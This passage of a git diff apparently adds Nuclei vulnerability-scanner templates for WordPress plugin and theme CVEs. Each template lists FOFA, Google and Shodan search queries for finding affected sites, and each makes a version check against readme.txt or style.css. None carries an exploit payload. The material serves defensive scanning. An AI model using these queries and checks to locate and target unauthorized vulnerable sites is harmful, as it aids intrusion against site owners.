cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12555 + metadata: + fofa-query: "wp-content/plugins/sip-calculator/" + google-query: inurl:"/wp-content/plugins/sip-calculator/" + shodan-query: 'vuln:CVE-2024-12555' + tags: cve,wordpress,wp-plugin,sip-calculator,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/sip-calculator/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sip-calculator" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12572.yaml b/poc/cve/CVE-2024-12572.yaml new file mode 100644 index 0000000000..8b4355a15b --- /dev/null +++ b/poc/cve/CVE-2024-12572.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12572-99c5fc1f98bec101dce40530a6fa4801 + +info: + name: > + Hello in All Languages <= 1.0.6 - Cross-Site Request Forgery to Stored Cross-Site Scripting + author: topscoder + severity: medium + description: > + The Hello In All Languages plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.6. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/85501fc0-5d51-492b-b208-4b84f371ee77?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-12572 + metadata: + fofa-query: "wp-content/plugins/hello-in-all-languages/" + google-query: inurl:"/wp-content/plugins/hello-in-all-languages/" + shodan-query: 'vuln:CVE-2024-12572' + tags: cve,wordpress,wp-plugin,hello-in-all-languages,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/hello-in-all-languages/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "hello-in-all-languages" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12574.yaml b/poc/cve/CVE-2024-12574.yaml new file mode 100644 index 0000000000..f2d88425e3 --- /dev/null +++ b/poc/cve/CVE-2024-12574.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12574-411e698a90aecedc46e74ff8fd9e6336 + +info: + name: > + SVG Shortcode <= 1.0.1 - Authenticated (Author+) Stored Cross-Site Scripting via SVG Upload + author: topscoder + severity: low + description: > + The SVG Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/3b378256-2d9b-4aad-abfe-fecfc76f0bb4?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-12574 + metadata: + fofa-query: "wp-content/plugins/svg-shortcode/" + google-query: inurl:"/wp-content/plugins/svg-shortcode/" + shodan-query: 'vuln:CVE-2024-12574' + tags: cve,wordpress,wp-plugin,svg-shortcode,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/svg-shortcode/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "svg-shortcode" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12578-55a6532fce1626d6ca01169c30129bf3.yaml b/poc/cve/CVE-2024-12578-55a6532fce1626d6ca01169c30129bf3.yaml new file mode 100644 index 0000000000..038d2edaa3 --- /dev/null +++ b/poc/cve/CVE-2024-12578-55a6532fce1626d6ca01169c30129bf3.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12578-55a6532fce1626d6ca01169c30129bf3 + +info: + name: > + Tickera – WordPress Event Ticketing <= 3.5.4.8 - Unauthenticated Customer Data Exposure + author: topscoder + severity: medium + description: > + The Tickera – WordPress Event Ticketing plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 3.5.4.8 via the 'tickera_tickets_info' endpoint. This makes it possible for unauthenticated attackers to extract sensitive data from bookings like full names, email addresses, check-in/out timestamps and more. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2db29c12-bf8a-4d5a-b12a-6c74b816d5f0?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cve-id: CVE-2024-12578 + metadata: + fofa-query: "wp-content/plugins/tickera-event-ticketing-system/" + google-query: inurl:"/wp-content/plugins/tickera-event-ticketing-system/" + shodan-query: 'vuln:CVE-2024-12578' + tags: cve,wordpress,wp-plugin,tickera-event-ticketing-system,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/tickera-event-ticketing-system/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "tickera-event-ticketing-system" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.5.4.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12579.yaml b/poc/cve/CVE-2024-12579.yaml new file mode 100644 index 0000000000..bad6198d01 --- /dev/null +++ b/poc/cve/CVE-2024-12579.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12579-8e5be395d9ca09c678a7625547b378e8 + +info: + name: > + Minify HTML <= 2.1.10 - - Regular Expressions Denial of Service + author: topscoder + severity: medium + description: > + The Minify HTML plugin for WordPress is vulnerable to Regular Expression Denial of Service (ReDoS) in all versions up to, and including, 2.1.10. This is due to processing user-supplied input as a regular expression. This makes it possible for unauthenticated attackers to create comments that can cause catastrophic backtracking and break pages. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/80334e81-c33d-464c-9409-f49c34681890?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-12579 + metadata: + fofa-query: "wp-content/plugins/minify-html-markup/" + google-query: inurl:"/wp-content/plugins/minify-html-markup/" + shodan-query: 'vuln:CVE-2024-12579' + tags: cve,wordpress,wp-plugin,minify-html-markup,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/minify-html-markup/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "minify-html-markup" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.10') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12581.yaml b/poc/cve/CVE-2024-12581.yaml new file mode 100644 index 0000000000..7ac86668b0 --- /dev/null +++ b/poc/cve/CVE-2024-12581.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12581-76cef049807f0d0c701a5c76e40729ed + +info: + name: > + Kadence Blocks <= 3.2.53 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Gutenberg Blocks with AI by Kadence WP – Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 3.2.53 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/406f3eaf-44a7-4e32-a620-8799eb74742a?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-12581 + metadata: + fofa-query: "wp-content/plugins/kadence-blocks/" + google-query: inurl:"/wp-content/plugins/kadence-blocks/" + shodan-query: 'vuln:CVE-2024-12581' + tags: cve,wordpress,wp-plugin,kadence-blocks,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/kadence-blocks/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "kadence-blocks" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.2.53') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81.yaml b/poc/cve/CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81.yaml new file mode 100644 index 0000000000..40db676121 --- /dev/null +++ b/poc/cve/CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-12628-d21dcffe48f9c4b21314ab529a797a81 + +info: + name: > + bodi0’s Easy Cache <= 0.8 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The bodi0`s Easy cache plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'cache-folder' parameter in all versions up to, and including, 0.8 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/087034aa-efd0-44b9-9a2f-3a625806bcaa?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-12628 + metadata: + fofa-query: "wp-content/plugins/bodi0s-easy-cache/" + google-query: inurl:"/wp-content/plugins/bodi0s-easy-cache/" + shodan-query: 'vuln:CVE-2024-12628' + tags: cve,wordpress,wp-plugin,bodi0s-easy-cache,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bodi0s-easy-cache/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bodi0s-easy-cache" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 0.8') \ No newline at end of file diff --git a/poc/cve/CVE-2024-37250.yaml b/poc/cve/CVE-2024-37250.yaml new file mode 100644 index 0000000000..8b02f6d945 --- /dev/null +++ b/poc/cve/CVE-2024-37250.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-37250-cec91cbf25d411fc5c4746b653491fd3 + +info: + name: > + Advanced Custom Fields Pro <= 6.3.1 - Missing Authorization + author: topscoder + severity: low + description: > + The Advanced Custom Fields Pro plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 6.3.1. This makes it possible for authenticated attackers, with contributor-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/d8c1823c-72be-4342-b4e9-0dc18afbb4a8?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N + cvss-score: 5.4 + cve-id: CVE-2024-37250 + metadata: + fofa-query: "wp-content/plugins/advanced-custom-fields-pro/" + google-query: inurl:"/wp-content/plugins/advanced-custom-fields-pro/" + shodan-query: 'vuln:CVE-2024-37250' + tags: cve,wordpress,wp-plugin,advanced-custom-fields-pro,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/advanced-custom-fields-pro/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "advanced-custom-fields-pro" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 6.3.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43222.yaml b/poc/cve/CVE-2024-43222.yaml new file mode 100644 index 0000000000..b9beedfdf2 --- /dev/null +++ b/poc/cve/CVE-2024-43222.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43222-a87ec38511fe9aca759e14cc043b51af + +info: + name: > + Sweet Date <= 3.7.3 - Unauthenticated Privilege Escalation + author: topscoder + severity: critical + description: > + The Sweet Date theme for WordPress is vulnerable to privilege escalation due to a missing capability check on a function in all versions up to, and including, 3.7.3. This makes it possible for unauthenticated attackers to gain elevated access to a site. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8dd34937-7641-4b9c-ba59-c4a1ec95f4cd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.8 + cve-id: CVE-2024-43222 + metadata: + fofa-query: "wp-content/themes/sweetdate/" + google-query: inurl:"/wp-content/themes/sweetdate/" + shodan-query: 'vuln:CVE-2024-43222' + tags: cve,wordpress,wp-theme,sweetdate,critical + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/themes/sweetdate/style.css" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Version: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Version: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "sweetdate" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.7.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43300.yaml b/poc/cve/CVE-2024-43300.yaml new file mode 100644 index 0000000000..6c5474610a --- /dev/null +++ b/poc/cve/CVE-2024-43300.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43300-1ff6882a36c1af79508de845a52c5f74 + +info: + name: > + Movie Database <= 1.0.11 - Authenticated (Admin+) Stored Cross-Site Scripting + author: topscoder + severity: low + description: > + The Movie Database plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 1.0.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e3d8daef-787d-43f1-a438-958295294f6c?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N + cvss-score: 4.4 + cve-id: CVE-2024-43300 + metadata: + fofa-query: "wp-content/plugins/movie-database/" + google-query: inurl:"/wp-content/plugins/movie-database/" + shodan-query: 'vuln:CVE-2024-43300' + tags: cve,wordpress,wp-plugin,movie-database,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/movie-database/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "movie-database" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0.11') \ No newline at end of file diff --git a/poc/cve/CVE-2024-43968.yaml b/poc/cve/CVE-2024-43968.yaml new file mode 100644 index 0000000000..de991b6ac7 --- /dev/null +++ b/poc/cve/CVE-2024-43968.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-43968-4400b028a60e9b43044e8761dabd34b3 + +info: + name: > + Newspack <= 3.8.6 - Missing Authorization + author: topscoder + severity: low + description: > + The Newspack plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 3.8.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/f68e6fed-1986-4172-8270-0460450d6a02?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-43968 + metadata: + fofa-query: "wp-content/plugins/newspack-plugin/" + google-query: inurl:"/wp-content/plugins/newspack-plugin/" + shodan-query: 'vuln:CVE-2024-43968' + tags: cve,wordpress,wp-plugin,newspack-plugin,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/newspack-plugin/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "newspack-plugin" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.8.6') \ No newline at end of file diff --git a/poc/cve/CVE-2024-47321.yaml b/poc/cve/CVE-2024-47321.yaml new file mode 100644 index 0000000000..75199cfe83 --- /dev/null +++ b/poc/cve/CVE-2024-47321.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-47321-f5ac5a08ba05fc79b1104aeb1b8f65d9 + +info: + name: > + WP Datepicker <= 2.1.1 - Missing Authorization + author: topscoder + severity: high + description: > + The WP Datepicker plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 2.1.1. This makes it possible for unauthenticated attackers to perform an unauthorized action. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/38e8275f-477e-4d07-85b0-8bca71cd7089?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N + cvss-score: 5.3 + cve-id: CVE-2024-47321 + metadata: + fofa-query: "wp-content/plugins/wp-datepicker/" + google-query: inurl:"/wp-content/plugins/wp-datepicker/" + shodan-query: 'vuln:CVE-2024-47321' + tags: cve,wordpress,wp-plugin,wp-datepicker,high + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/wp-datepicker/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "wp-datepicker" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 2.1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-49323.yaml b/poc/cve/CVE-2024-49323.yaml new file mode 100644 index 0000000000..a3c42d116c --- /dev/null +++ b/poc/cve/CVE-2024-49323.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-49323-61e0800fe6baa2cae8b68fbd815349c4 + +info: + name: > + All in One Slider <= 1.1 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The All in One Slider plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/1371d1ea-a415-4cd8-bc99-a530670ffb94?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-49323 + metadata: + fofa-query: "wp-content/plugins/all-in-one-slider/" + google-query: inurl:"/wp-content/plugins/all-in-one-slider/" + shodan-query: 'vuln:CVE-2024-49323' + tags: cve,wordpress,wp-plugin,all-in-one-slider,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/all-in-one-slider/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "all-in-one-slider" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-49334.yaml b/poc/cve/CVE-2024-49334.yaml new file mode 100644 index 0000000000..3ebad99437 --- /dev/null +++ b/poc/cve/CVE-2024-49334.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-49334-11700dd427899256e6373b115ef06811 + +info: + name: > + jLayer Parallax Slider <= 1.0 - Reflected Cross-Site Scripting + author: topscoder + severity: medium + description: > + The jLayer Parallax Slider plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/33e5ca87-2e45-4b85-818e-02093bbf66ee?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2024-49334 + metadata: + fofa-query: "wp-content/plugins/jlayer-parallax-slider-wp/" + google-query: inurl:"/wp-content/plugins/jlayer-parallax-slider-wp/" + shodan-query: 'vuln:CVE-2024-49334' + tags: cve,wordpress,wp-plugin,jlayer-parallax-slider-wp,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/jlayer-parallax-slider-wp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "jlayer-parallax-slider-wp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.0') \ No newline at end of file diff --git a/poc/cve/CVE-2024-5029.yaml b/poc/cve/CVE-2024-5029.yaml new file mode 100644 index 0000000000..2bb7bd864f --- /dev/null +++ b/poc/cve/CVE-2024-5029.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-5029-eabfce5ae00a84e55589a7640da45e1c + +info: + name: > + CM Table Of Contents <= 1.2.3 - Cross-Site Request Forgery + author: topscoder + severity: medium + description: > + The CM Table Of Contents – WordPress TOC Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.3. This is due to missing or incorrect nonce validation on one of its functions. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/2a5f4a74-3974-4d08-8238-387e573a5655?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-5029 + metadata: + fofa-query: "wp-content/plugins/cm-table-of-content/" + google-query: inurl:"/wp-content/plugins/cm-table-of-content/" + shodan-query: 'vuln:CVE-2024-5029' + tags: cve,wordpress,wp-plugin,cm-table-of-content,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/cm-table-of-content/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "cm-table-of-content" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.2.3') \ No newline at end of file diff --git a/poc/cve/CVE-2024-50423.yaml b/poc/cve/CVE-2024-50423.yaml new file mode 100644 index 0000000000..99de8417ec --- /dev/null +++ b/poc/cve/CVE-2024-50423.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-50423-e7e041c790fe504684de2e185f30a8e2 + +info: + name: > + Templately <= 3.1.5 - Missing Authorization + author: topscoder + severity: low + description: > + The Templately plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in versions up to, and including, 3.1.5. This makes it possible for authenticated attackers, with contributor-level access and above, to invoke those functions. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/63ea8485-8a3f-4d83-91ee-85591077464f?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-50423 + metadata: + fofa-query: "wp-content/plugins/templately/" + google-query: inurl:"/wp-content/plugins/templately/" + shodan-query: 'vuln:CVE-2024-50423' + tags: cve,wordpress,wp-plugin,templately,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/templately/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "templately" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 3.1.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-50504.yaml b/poc/cve/CVE-2024-50504.yaml new file mode 100644 index 0000000000..fe1a0da580 --- /dev/null +++ b/poc/cve/CVE-2024-50504.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-50504-dd2a52c91cedd2c370ed91df355bfdba + +info: + name: > + Bulk Change Role <= 1.1 - Missing Authorization to Authenticated (Subscriber+) Privilege Escalation + author: topscoder + severity: low + description: > + The Bulk Change Role plugin for WordPress is vulnerable to privilege escalation due to a missing capability check on the bulk_change_role_callback() function in all versions up to, and including, 1.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to set their role to that of an administrator. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/e6e7889b-a1e2-439f-891d-c7c9a052cafc?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H + cvss-score: 8.8 + cve-id: CVE-2024-50504 + metadata: + fofa-query: "wp-content/plugins/bulk-role-change/" + google-query: inurl:"/wp-content/plugins/bulk-role-change/" + shodan-query: 'vuln:CVE-2024-50504' + tags: cve,wordpress,wp-plugin,bulk-role-change,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/bulk-role-change/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "bulk-role-change" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 1.1') \ No newline at end of file diff --git a/poc/cve/CVE-2024-50506.yaml b/poc/cve/CVE-2024-50506.yaml new file mode 100644 index 0000000000..b5edea945b --- /dev/null +++ b/poc/cve/CVE-2024-50506.yaml @@ -0,0 +1,59 @@ +id: CVE-2024-50506-4d3cb42ced965efd1907b845f06c8f7d + +info: + name: > + 